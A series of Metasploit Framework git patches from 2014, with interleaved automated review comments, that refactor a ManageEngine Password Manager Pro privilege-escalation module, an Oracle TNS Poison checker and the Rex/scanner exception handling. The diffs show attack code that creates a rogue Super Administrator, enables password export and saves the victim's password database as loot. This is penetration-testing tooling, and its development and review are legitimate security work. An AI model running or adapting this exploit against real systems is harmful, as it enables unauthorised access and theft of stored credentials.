diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index ae6517d5fd..c39efd7c76 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -59,13 +59,13 @@ class Metasploit3 < Msf::Auxiliary if res && res.code == 200 # 2nd step: we try to get the ORGN_NAME and AUTHRULE_NAME from the page (which is only needed for the MSP versions) - if res.body.to_s =~ /id="ORGN_NAME" name="ORGN_NAME" value="([\w]*)"/ + if res.body && res.body.to_s =~ /id="ORGN_NAME" name="ORGN_NAME" value="([\w]*)"/ orgn_name = $1 else orgn_name = nil end - if res.body.to_s =~ /id="AUTHRULE_NAME" name="AUTHRULE_NAME" value="([\w]*)"/ + if res.body && res.body.to_s =~ /id="AUTHRULE_NAME" name="AUTHRULE_NAME" value="([\w]*)"/ authrule_name = $1 else authrule_name = nil @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Auxiliary 'userName' => username } }) - if res && res.code == 200 + if res && res.code == 200 && res.body domain_name = res.body.to_s.strip else domain_name = nil @@ -192,7 +192,7 @@ class Metasploit3 < Msf::Auxiliary 'uri' => normalize_uri("PassTrixMain.cc"), 'method' => 'GET' }) - if res && res.code == 200 && + if res && res.code == 200 && res.body && res.body.to_s =~ /ManageEngine Password Manager Pro/ && ( res.body.to_s =~ /login\.css\?([0-9]+)/ || # PMP v6 @@ -259,7 +259,7 @@ class Metasploit3 < Msf::Auxiliary 'RequestType' => 'ExportResources' } }) - if res && res.code == 200 && res.body.to_s.length > 0 + if res && res.code == 200 && res.body && res.body.to_s.length > 0 vprint_line(res.body.to_s) print_good("#{peer} - Successfully exported password database from Password Manager Pro.") loot_name = 'manageengine.passwordmanagerpro.password.db' From 9c033492d24f329517964cbec692b353ffb257d2 Mon Sep 17 00:00:00 2001 
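Review bot: `nil.to_s` is `""`, so the added `res.body &&` guards in front of `res.body.to_s` do not change behaviour: the regex matches, the strip and the length test already behave the same on a nil body. If the intent is to avoid acting on an empty body in login's domain-name step, the guard does not achieve it — an empty body still yields `domain_name = ""`, which is truthy and is posted as an empty domainName; the useful check there is `if res && res.code == 200 && !res.body.to_s.strip.empty?`. The enclosing methods (login, get_version, run) extend beyond each hunk.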
From: jvazquez-r7 Date: Mon, 10 Nov 2014 09:48:22 -0600 Subject: [PATCH 13/38] Fix indentation --- modules/auxiliary/admin/http/manageengine_pmp_privesc.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index c39efd7c76..4cceb67f2b 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -189,9 +189,9 @@ class Metasploit3 < Msf::Auxiliary def get_version res = send_request_cgi({ - 'uri' => normalize_uri("PassTrixMain.cc"), - 'method' => 'GET' - }) + 'uri' => normalize_uri("PassTrixMain.cc"), + 'method' => 'GET' + }) if res && res.code == 200 && res.body && res.body.to_s =~ /ManageEngine Password Manager Pro/ && ( From 635df2f233a33218092681f7174c8e1130e75e36 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 10 Nov 2014 09:50:26 -0600 Subject: [PATCH 14/38] Fail with NoAccess --- modules/auxiliary/admin/http/manageengine_pmp_privesc.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index 4cceb67f2b..19a5d86e21 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -223,7 +223,7 @@ class Metasploit3 < Msf::Auxiliary version = get_version @cookie = login(datastore['USERNAME'], datastore['PASSWORD']) if @cookie == nil - fail_with(Failure::Unknown, "#{peer} - Failed to authenticate.") + fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate.") end creds = inject_sql(version < 7000 ? true : false) From 8f17011909009e52b2ba45a32b902baaaed75400 Mon Sep 17 00:00:00 2001 
From: jvazquez-r7 Date: Mon, 10 Nov 2014 11:11:49 -0600 Subject: [PATCH 15/38] do run clean up * Reduce code complexity * Don't report not valid administrator credentials --- .../admin/http/manageengine_pmp_privesc.rb | 101 +++++++++--------- 1 file changed, 53 insertions(+), 48 deletions(-) diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index 19a5d86e21..ee0a87ad62 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -220,6 +220,10 @@ class Metasploit3 < Msf::Auxiliary def run + unless check == Exploit::CheckCode::Appears + print_error("#{peer} - Fingerprint hasn't been successful, trying to exploit anyway...") + end + version = get_version @cookie = login(datastore['USERNAME'], datastore['PASSWORD']) if @cookie == nil 
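Review bot: The new guard in run only compares against Appears, so a target that `check` classifies as Safe (build 7105 or newer per get_version's ranges) is handled exactly like an unfingerprintable one and the injection is still fired at a host believed to be patched; distinguish the two, e.g. `fail_with(Failure::NotVulnerable, "#{peer} - Target appears to be patched")` for Safe and a print_warning for Unknown. The guard also calls check, which runs get_version, and the very next line calls get_version again, so the fingerprint request is sent twice per run; compute `version = get_version` once and derive the check code from it. run continues past the end of this hunk.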
@@ -232,57 +236,58 @@ class Metasploit3 < Msf::Auxiliary print_good("#{peer} - Created a new Super Administrator with username: #{username} | password: #{password}") cookie_su = login(username, password) - if cookie_su != nil - # 1st we turn on password exports - send_request_cgi({ - 'method' => 'POST', - 'uri' => normalize_uri(target_uri.path, 'ConfigureOffline.ve'), - 'cookie' => cookie_su, - 'vars_post' => { - 'IS_XLS' => 'true', - 'includePasswd' => 'true', - 'HOMETAB' => 'true', - 'RESTAB' => 'true', - 'RGTAB' => 'true', - 'PASSWD_RULE' => 'Offline Password File', - 'LOGOUT_TIME' => '20' - } - }) - - # now get the loot! - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, 'jsp', 'xmlhttp', 'AjaxResponse.jsp'), - 'cookie' => cookie_su, - 'vars_get' => { - 'RequestType' => 'ExportResources' - } - }) - if res && res.code == 200 && res.body && res.body.to_s.length > 0 - vprint_line(res.body.to_s) - print_good("#{peer} - Successfully exported password database from Password Manager Pro.") - loot_name = 'manageengine.passwordmanagerpro.password.db' - loot_type = 'text/csv' - loot_filename = 'manageengine_pmp_password_db.csv' - loot_desc = 'ManageEngine Password Manager Pro Password DB' - p = store_loot( - loot_name, - loot_type, - rhost, - res.body, - loot_filename, - loot_desc) - print_status "Password database saved in: #{p}" - else - print_error("#{peer} - Failed to export Password Manager Pro passwords.") - end - status = Metasploit::Model::Login::Status::SUCCESSFUL - else - print_error("#{peer} - Failed to authenticate as Super Administrator, account #{username} might not work.") - status = Metasploit::Model::Login::Status::DENIED_ACCESS + if cookie_su.nil? 
+ fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate as Super Administrator, account #{username} might not work.") end + # 1st we turn on password exports + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'ConfigureOffline.ve'), + 'cookie' => cookie_su, + 'vars_post' => { + 'IS_XLS' => 'true', + 'includePasswd' => 'true', + 'HOMETAB' => 'true', + 'RESTAB' => 'true', + 'RGTAB' => 'true', + 'PASSWD_RULE' => 'Offline Password File', + 'LOGOUT_TIME' => '20' + } + }) + + # now get the loot! + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'jsp', 'xmlhttp', 'AjaxResponse.jsp'), + 'cookie' => cookie_su, + 'vars_get' => { + 'RequestType' => 'ExportResources' + } + }) + + if res && res.code == 200 && res.body && res.body.to_s.length > 0 + vprint_line(res.body.to_s) + print_good("#{peer} - Successfully exported password database from Password Manager Pro.") + loot_name = 'manageengine.passwordmanagerpro.password.db' + loot_type = 'text/csv' + loot_filename = 'manageengine_pmp_password_db.csv' + loot_desc = 'ManageEngine Password Manager Pro Password DB' + p = store_loot( + loot_name, + loot_type, + rhost, + res.body, + loot_filename, + loot_desc) + print_status "Password database saved in: #{p}" + else + print_error("#{peer} - Failed to export Password Manager Pro passwords.") + end + status = Metasploit::Model::Login::Status::SUCCESSFUL + + service_data = { address: rhost, port: rport, From 92df11baa70d1f41d73734da42de500230f67512 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 10 Nov 2014 11:16:25 -0600 Subject: [PATCH 16/38] Create report_super_admin_creds method --- .../admin/http/manageengine_pmp_privesc.rb | 35 +++++++++++-------- 1 file changed, 20 insertions(+), 15 deletions(-) diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index ee0a87ad62..dfd0b2f323 100644 
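Review bot: The response of the first send_request_cgi (the POST to ConfigureOffline.ve that switches password export on) is thrown away, so a failed or timed-out request (nil return) goes unnoticed and only surfaces later as the less specific "Failed to export" message. Assigning the result, `res = send_request_cgi({ ... })`, and checking it before the export request, e.g. `fail_with(Failure::Unknown, "#{peer} - Failed to enable password export.") unless res && res.code == 200` (whatever status the application actually returns on success should be confirmed), makes the failure point explicit; the same applies to the loot_passwords method introduced in PATCH 17 below. `res.body.to_s.length > 0` reads more idiomatically as `!res.body.to_s.empty?`. The enclosing run method begins before this hunk.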
--- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -239,6 +239,8 @@ class Metasploit3 < Msf::Auxiliary if cookie_su.nil? fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate as Super Administrator, account #{username} might not work.") + else + report_super_admin_creds(username, password) end # 1st we turn on password exports @@ -285,31 +287,34 @@ class Metasploit3 < Msf::Auxiliary else print_error("#{peer} - Failed to export Password Manager Pro passwords.") end + end + + def report_super_admin_creds(username, password) status = Metasploit::Model::Login::Status::SUCCESSFUL - service_data = { - address: rhost, - port: rport, - service_name: 'https', - protocol: 'tcp', - workspace_id: myworkspace_id + address: rhost, + port: rport, + service_name: 'https', + protocol: 'tcp', + workspace_id: myworkspace_id } + credential_data = { - origin_type: :service, - module_fullname: self.fullname, - private_type: :password, - private_data: username, - username: password + origin_type: :service, + module_fullname: self.fullname, + private_type: :password, + private_data: username, + username: password } credential_data.merge!(service_data) credential_core = create_credential(credential_data) login_data = { - core: credential_core, - access_level: 'Super Administrator', - status: status, - last_attempted_at: DateTime.now + core: credential_core, + access_level: 'Super Administrator', + status: status, + last_attempted_at: DateTime.now } login_data.merge!(service_data) create_credential_login(login_data) From 7aed1e9581de560af0b0d7d794fb36f43f6be475 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 10 Nov 2014 11:21:44 -0600 Subject: [PATCH 17/38] Create loot_passwords method --- .../admin/http/manageengine_pmp_privesc.rb | 96 ++++++++++--------- 1 file changed, 51 insertions(+), 45 deletions(-) 
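Review bot: In the extracted report_super_admin_creds the credential hash has the two values crossed: `private_data: username,` / `username: password` records the password as the public part and the username as the secret, so the stored login is unusable and the reported "private" is not the password. The lines should read `private_data: password,` and `username: username`; the swap is carried over from the code that was moved, but this extraction is the natural place to fix it. `self.fullname` can be plain `fullname`, and a one-line comment on the method, such as `# Persists the created Super Administrator account as a successful login against the target service`, would document what it does.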
diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index dfd0b2f323..5273dfa348 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb 
@@ -239,54 +239,13 @@ class Metasploit3 < Msf::Auxiliary if cookie_su.nil? fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate as Super Administrator, account #{username} might not work.") - else - report_super_admin_creds(username, password) end - # 1st we turn on password exports - send_request_cgi({ - 'method' => 'POST', - 'uri' => normalize_uri(target_uri.path, 'ConfigureOffline.ve'), - 'cookie' => cookie_su, - 'vars_post' => { - 'IS_XLS' => 'true', - 'includePasswd' => 'true', - 'HOMETAB' => 'true', - 'RESTAB' => 'true', - 'RGTAB' => 'true', - 'PASSWD_RULE' => 'Offline Password File', - 'LOGOUT_TIME' => '20' - } - }) + print_stats("#{peer} - Reporting Super Administrator credentials...") + report_super_admin_creds(username, password) - # now get the loot! - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, 'jsp', 'xmlhttp', 'AjaxResponse.jsp'), - 'cookie' => cookie_su, - 'vars_get' => { - 'RequestType' => 'ExportResources' - } - }) - - if res && res.code == 200 && res.body && res.body.to_s.length > 0 - vprint_line(res.body.to_s) - print_good("#{peer} - Successfully exported password database from Password Manager Pro.") - loot_name = 'manageengine.passwordmanagerpro.password.db' - loot_type = 'text/csv' - loot_filename = 'manageengine_pmp_password_db.csv' - loot_desc = 'ManageEngine Password Manager Pro Password DB' - p = store_loot( - loot_name, - loot_type, - rhost, - res.body, - loot_filename, - loot_desc) - print_status "Password database saved in: #{p}" - else - print_error("#{peer} - Failed to export Password Manager Pro passwords.") - end + print_status("#{peer} - Leaking Password database...") + loot_passwords(cookie_su) end def report_super_admin_creds(username, password) 
@@ -319,4 +278,51 @@ class Metasploit3 < Msf::Auxiliary login_data.merge!(service_data) create_credential_login(login_data) end + + def loot_passwords(cookie_admin) + # 1st we turn on password exports + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'ConfigureOffline.ve'), + 'cookie' => cookie_admin, + 'vars_post' => { + 'IS_XLS' => 'true', + 'includePasswd' => 'true', + 'HOMETAB' => 'true', + 'RESTAB' => 'true', + 'RGTAB' => 'true', + 'PASSWD_RULE' => 'Offline Password File', + 'LOGOUT_TIME' => '20' + } + }) + + # now get the loot! + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'jsp', 'xmlhttp', 'AjaxResponse.jsp'), + 'cookie' => cookie_admin, + 'vars_get' => { + 'RequestType' => 'ExportResources' + } + }) + + if res && res.code == 200 && res.body && res.body.to_s.length > 0 + vprint_line(res.body.to_s) + print_good("#{peer} - Successfully exported password database from Password Manager Pro.") + loot_name = 'manageengine.passwordmanagerpro.password.db' + loot_type = 'text/csv' + loot_filename = 'manageengine_pmp_password_db.csv' + loot_desc = 'ManageEngine Password Manager Pro Password DB' + p = store_loot( + loot_name, + loot_type, + rhost, + res.body, + loot_filename, + loot_desc) + print_status("#{peer} - Password database saved in: #{p}") + else + print_error("#{peer} - Failed to export Password Manager Pro passwords.") + end + end end From 65dbb1a83f5025ccf469a51c3157e8a19213019f Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 10 Nov 2014 11:26:53 -0600 Subject: [PATCH 18/38] Do print_status --- modules/auxiliary/admin/http/manageengine_pmp_privesc.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index 5273dfa348..1bbc7a5656 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb 
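Review bot: loot_passwords has no documentation of its contract, and its parameter name does not say what kind of value it expects. A comment such as `# Enables the password export setting via ConfigureOffline.ve and stores the exported CSV as loot; cookie_admin is the session cookie of the Super Administrator created in run.` above the method would cover that. Inside the body `res.body.to_s.length > 0` is more idiomatically `!res.body.to_s.empty?`, and the four loot_* strings are constants in all but name and could be frozen class-level constants.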
+++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -241,7 +241,7 @@ class Metasploit3 < Msf::Auxiliary fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate as Super Administrator, account #{username} might not work.") end - print_stats("#{peer} - Reporting Super Administrator credentials...") + print_status("#{peer} - Reporting Super Administrator credentials...") report_super_admin_creds(username, password) print_status("#{peer} - Leaking Password database...") From 4b701700c1a80e7fd8afc101534ddc82d8c1a547 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 10 Nov 2014 12:40:53 -0600 Subject: [PATCH 19/38] Fix banner --- modules/auxiliary/admin/http/manageengine_pmp_privesc.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index 1bbc7a5656..8b4361b4eb 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -1,5 +1,5 @@ ## -# This module requires Metasploit: http//metasploit.com/download +# This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## From c0285067c9ecb0b7e7c8571d3c7a137d27784103 Mon Sep 17 00:00:00 2001 
From: Nikita Date: Tue, 11 Nov 2014 17:29:27 +0300 Subject: [PATCH 20/38] Add new module to test TNS poison msf auxiliary(tnspoison_checker) > show options Module options (auxiliary/scanner/oracle/tnspoison_checker1): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 172.16.2.100, 172.16.2.24, 172.16.2.101 yes The target address range or CIDR identifier RPORT 1521 yes The target port THREADS 1 yes The number of concurrent threads msf auxiliary(tnspoison_checker) > exploit [+] 172.16.2.100:1521 is vulnerable [*] Scanned 1 of 3 hosts (033% complete) [-] 172.16.2.24:1521 is not vulnerable [*] Scanned 2 of 3 hosts (066% complete) [-] 172.16.2.101:1521 unable to connect to the server [*] Scanned 3 of 3 hosts (100% complete) [*] Auxiliary module execution completed --- .../scanner/oracle/tnspoison_checker.rb | 39 ++++++++----------- 1 file changed, 16 insertions(+), 23 deletions(-) diff --git a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb index 8f22c55533..cbc48eb1f1 100644 --- a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb +++ b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb 
@@ -13,14 +13,17 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'Oracle TNS Poison vulnerability', + 'Name' => 'Oracle TNS Listener Checker', 'Description' => %q{ - This module simply checks the server for vulnerabilities like TNS Poison. + This module checks the server for vulnerabilities like TNS Poison. + Module sends to server a packet with command to register new TNS Listener and check response. }, - 'Author' => ['ir0njaw (Kelesis Nikita)'], - 'Company' => ['Digital Security - http://dsec.ru'], - 'License' => MSF_LICENSE, - 'DisclosureDate' => 'Oct 12 2014')) + 'Author' => ['ir0njaw (Nikita Kelesis) '], # of Digital Security [http://dsec.ru] + 'References' => + [ + [ 'URL', 'http://seclists.org/fulldisclosure/2012/Apr/204' ], + ], + 'License' => MSF_LICENSE)) register_options( [ @@ -33,23 +36,13 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) begin connect - - pkt = tns_packet("(CONNECT_DATA=(COMMAND=service_register_NSGR))") - sock.put(pkt) - a= sock.read(100) - - flag = a.include? "(ERROR_STACK=(ERROR=" - if (flag==true) then print_error ip+" is not vulnerable" - else print_good ip+" is vulnerable" - end - - rescue ::Rex::ConnectionError, ::Errno::EPIPE - print_error("#{ip} unable to connect to the server") - - - rescue ::Rex::ConnectionError - rescue ::Errno::EPIPE - + send_packet = tns_packet("(CONNECT_DATA=(COMMAND=service_register_NSGR))") + sock.put(send_packet) + packet = sock.read(100) + find_packet = packet.include? "(ERROR_STACK=(ERROR=" + find_packet == true ? print_error("#{ip}:#{rport} is not vulnerable ") : print_good("#{ip}:#{rport} is vulnerable") + rescue ::Rex::ConnectionError, ::Errno::EPIPE + print_error("#{ip}:#{rport} unable to connect to the server") end end end From 6b4eb9a8e23452d26c6074bea61ecf03a6e44a20 Mon Sep 17 00:00:00 2001 
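Review bot: `packet = sock.read(100)` in run_host is used with include? unguarded; if the listener closes the connection without sending anything, read may return nil or raise EOFError (depends on Rex::IO::Stream#read, worth confirming), and neither case is covered by the rescue clause, so a single host can abort the whole scan. Coercing with `packet = sock.read(100).to_s` and adding `::EOFError` to the rescue list covers both, and `find_packet == true ? ... : ...` reads better as an if/else on `packet.include?("(ERROR_STACK=(ERROR=")` with the stray trailing space in `"is not vulnerable "` dropped. The socket is never released: an `ensure` / `disconnect` after the rescue closes each host's connection. Msf::Auxiliary::Report is mixed in but nothing is recorded; a report_vuln call on the vulnerable branch, using the seclists reference already listed in the metadata, would persist the finding in the database.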
From: HD Moore Date: Tue, 11 Nov 2014 14:59:41 -0600 Subject: [PATCH 21/38] Differentiate failed binds from connects, closes #4169 This change adds two new Rex exceptions and changes the local comm to raise the right one depending on the circumstances. The problem with the existing model is that failed binds and failed connections both raised the same exception. This change is backwards compatible with modules that rescue Rex::AddressInUse in addition to Rex::ConnectionError. There were two corner cases that rescued Rex::AddressInUse specifically: 1. The 'r'-services mixin and modules caught the old exception when handling bind errors. These have been updated to use BindFailed 2. The meterpreter client had a catch for the old exception when the socket reports a bad destination (usually a network connection dropped). This has been updated to use InvalidDestination as that was the intention prior to this change. Since AddressInUse was part of ConnectionError, modules and mixins which caught both in the same rescue have been updated to just catch ConnectionError. 
--- lib/metasploit/framework/login_scanner/ftp.rb | 2 +- .../framework/login_scanner/telnet.rb | 2 +- lib/msf/core/auxiliary/rservices.rb | 2 +- lib/msf/core/auxiliary/scanner.rb | 48 +++++++++++++++++-- lib/rex/exceptions.rb | 42 ++++++++++++++-- lib/rex/post/meterpreter/ui/console.rb | 2 +- lib/rex/socket/comm/local.rb | 4 +- modules/auxiliary/gather/xerox_pwd_extract.rb | 6 +-- .../scanner/rservices/rexec_login.rb | 2 +- .../auxiliary/scanner/rservices/rsh_login.rb | 2 +- .../scanner/ssh/cerberus_sftp_enumusers.rb | 4 +- .../auxiliary/scanner/ssh/ssh_enumusers.rb | 2 +- .../scanner/ssh/ssh_identify_pubkeys.rb | 2 +- .../apple_ios/ssh/cydia_default_ssh.rb | 2 +- .../linux/ssh/f5_bigip_known_privkey.rb | 2 +- ...oadbalancerorg_enterprise_known_privkey.rb | 2 +- .../linux/ssh/quantum_dxi_known_privkey.rb | 2 +- .../linux/ssh/quantum_vmpro_backdoor.rb | 2 +- .../exploits/linux/ssh/symantec_smg_ssh.rb | 2 +- modules/exploits/multi/ssh/sshexec.rb | 2 +- modules/exploits/unix/misc/xerox_mfp.rb | 2 +- .../ssh/array_vxag_vapv_privkey_privesc.rb | 2 +- .../unix/ssh/tectia_passwd_changereq.rb | 2 +- 23 files changed, 105 insertions(+), 35 deletions(-) diff --git a/lib/metasploit/framework/login_scanner/ftp.rb b/lib/metasploit/framework/login_scanner/ftp.rb index 98b2b2f835..6c8ad94028 100644 --- a/lib/metasploit/framework/login_scanner/ftp.rb +++ b/lib/metasploit/framework/login_scanner/ftp.rb @@ -41,7 +41,7 @@ module Metasploit begin success = connect_login(credential.public, credential.private) - rescue ::EOFError, Errno::ECONNRESET, Rex::AddressInUse, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error + rescue ::EOFError, Errno::ECONNRESET, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error result_options[:status] = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT success = false end diff --git a/lib/metasploit/framework/login_scanner/telnet.rb b/lib/metasploit/framework/login_scanner/telnet.rb index c227a82187..f104cdf708 100644 
--- a/lib/metasploit/framework/login_scanner/telnet.rb +++ b/lib/metasploit/framework/login_scanner/telnet.rb @@ -92,7 +92,7 @@ module Metasploit end end - rescue ::EOFError, Errno::ECONNRESET, Rex::AddressInUse, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error + rescue ::EOFError, Errno::ECONNRESET, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error result_options[:status] = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT end diff --git a/lib/msf/core/auxiliary/rservices.rb b/lib/msf/core/auxiliary/rservices.rb index 9d7e09a768..3313786bed 100644 --- a/lib/msf/core/auxiliary/rservices.rb +++ b/lib/msf/core/auxiliary/rservices.rb @@ -35,7 +35,7 @@ module Auxiliary::RServices begin sd = connect(true, { 'CPORT' => cport }) - rescue Rex::AddressInUse + rescue Rex::BindFailed # Ignore and try again #vprint_error("Unable to connect: #{$!}") diff --git a/lib/msf/core/auxiliary/scanner.rb b/lib/msf/core/auxiliary/scanner.rb index 856b7bfddc..f2c50e9e39 100644 --- a/lib/msf/core/auxiliary/scanner.rb +++ b/lib/msf/core/auxiliary/scanner.rb @@ -57,6 +57,7 @@ def run threads_max = datastore['THREADS'].to_i @tl = [] + @scan_errors = [] # # Sanity check threading given different conditions @@ -87,17 +88,22 @@ def run begin if (self.respond_to?('run_range')) - # No automated progress reporting for run_range + # No automated progress reporting or error handling for run_range return run_range(datastore['RHOSTS']) end if (self.respond_to?('run_host')) - @tl = [] - loop do + # Stop scanning if we hit a fatal error + break if @scan_errors.length > 0 + # Spawn threads for each host while (@tl.length < threads_max) + + # Stop scanning if we hit a fatal error + break if @scan_errors.length > 0 + ip = ar.next_ip break if not ip 
@@ -108,6 +114,10 @@ def run begin nmod.run_host(targ) + rescue ::Rex::BindFailed + if datastore['CHOST'] + @scan_errors << "The source IP (CHOST) value of #{datastore['CHOST']} was not usable" + end rescue ::Rex::ConnectionError, ::Rex::ConnectionProxyError, ::Errno::ECONNRESET, ::Errno::EINTR, ::Rex::TimeoutError, ::Timeout::Error, ::EOFError rescue ::Interrupt,::NoMethodError, ::RuntimeError, ::ArgumentError, ::NameError raise $! @@ -120,6 +130,9 @@ def run end end + # Stop scanning if we hit a fatal error + break if @scan_errors.length > 0 + # Exit once we run out of hosts if(@tl.length == 0) break @@ -139,6 +152,7 @@ def run scanner_show_progress() if @show_progress end + scanner_report_fatal_errors return end @@ -153,10 +167,12 @@ def run ar = Rex::Socket::RangeWalker.new(datastore['RHOSTS']) - @tl = [] - while(true) nohosts = false + + # Stop scanning if we hit a fatal error + break if @scan_errors.length > 0 + while (@tl.length < threads_max) batch = [] @@ -178,6 +194,10 @@ def run mybatch = bat.dup begin nmod.run_batch(mybatch) + rescue ::Rex::BindFailed + if datastore['CHOST'] + @scan_errors << "The source IP (CHOST) value of #{datastore['CHOST']} was not usable" + end rescue ::Rex::ConnectionError, ::Rex::ConnectionProxyError, ::Errno::ECONNRESET, ::Errno::EINTR, ::Rex::TimeoutError, ::Timeout::Error rescue ::Interrupt,::NoMethodError, ::RuntimeError, ::ArgumentError, ::NameError raise $! @@ -197,6 +217,9 @@ def run end end + # Stop scanning if we hit a fatal error + break if @scan_errors.length > 0 + # Exit if there are no more pending threads if (@tl.length == 0) break @@ -218,6 +241,7 @@ def run scanner_show_progress() if @show_progress end + scanner_report_fatal_errors return end 
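Review bot: The new `rescue ::Rex::BindFailed` arms in both the run_host and run_batch loops only record an error when datastore['CHOST'] is set; without CHOST the exception is swallowed with no output at all, so a bind failure from a module that opens a local listener disappears silently. An `else` arm that at least surfaces it, e.g. `else` / `print_error("Bind failed: #{$!}")`, keeps the failure visible without making it fatal. `@scan_errors` is appended from worker threads and read from the loop that spawns them; MRI's interpreter lock makes Array#<< safe in practice but that is not a documented guarantee, so a short comment stating the assumption would help the next maintainer. The `break if @scan_errors.length > 0` line is now repeated in several places and reads better as a small predicate such as `def scan_aborted?` returning `@scan_errors.any?`; the enclosing run method starts before these hunks.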
@@ -240,6 +264,20 @@ def seppuko! end end +def scanner_report_fatal_errors + return unless @scan_errors && @scan_errors.length > 0 + return unless @tl + + # First kill any running threads + @tl.each {|t| t.kill if t.alive? } + + # Show the unique errors triggered by the scan + @scan_errors.uniq.each do |emsg| + print_error("Fatal: #{emsg}") + end + print_status("Scan terminated due to one or more fatal errors") +end + def scanner_progress return 0 unless @range_done and @range_count pct = (@range_done / @range_count.to_f) * 100 diff --git a/lib/rex/exceptions.rb b/lib/rex/exceptions.rb index 15edd0ae61..73b085f5ee 100644 --- a/lib/rex/exceptions.rb +++ b/lib/rex/exceptions.rb 
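Review bot: scanner_report_fatal_errors kills whatever is still alive in @tl but does not wait for those threads, so a host thread may still be running its ensure/cleanup while "Scan terminated" is printed, and @tl keeps references to the dead threads afterwards. Following the kill loop with `@tl.each(&:join)` (a killed thread finishes its ensure blocks and then returns from join) and, if nothing else reads @tl after this point, `@tl.clear` makes the shutdown orderly. The method also lacks a header comment; `# Kill any remaining scan threads and print the unique fatal errors collected in @scan_errors during the run.` says what it does, and `return unless @scan_errors && @scan_errors.length > 0` is simply `return if @scan_errors.to_a.empty?`.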
@@ -213,25 +213,57 @@ class ConnectionTimeout < ConnectionError end end +### +# +# This connection error is raised when an attempt is made to connect +# to a broadcast or network address. +# +### +class InvalidDestination < ConnectionError + include SocketError + include HostCommunicationError + + def to_s + "The destination is invalid: #{addr_to_s}." + end +end ### # # This exception is raised when an attempt to use an address or port that is -# already in use occurs, such as binding to a host on a given port that is -# already in use. Note that Windows raises this in some cases when attempting -# to connect to addresses that it can't handle, e.g. "0.0.0.0". Thus, this is -# a ConnectionError. +# already in use or onot available occurs. such as binding to a host on a +# given port that is already in use, or when a bind address is specified that +# is not available to the host. # ### +class BindFailed < ::ArgumentError + include SocketError + include HostCommunicationError + + def to_s + "The address is already in use or unavailable: #{addr_to_s}." + end +end + +## +# +# This exception is listed for backwards compatibility. We had been +# using AddressInUse as the exception for both bind errors and connection +# errors triggered by connection attempts to broadcast and network addresses. +# The two classes above have split this into their respective sources, but +# callers may still expect the old behavior. +# +## class 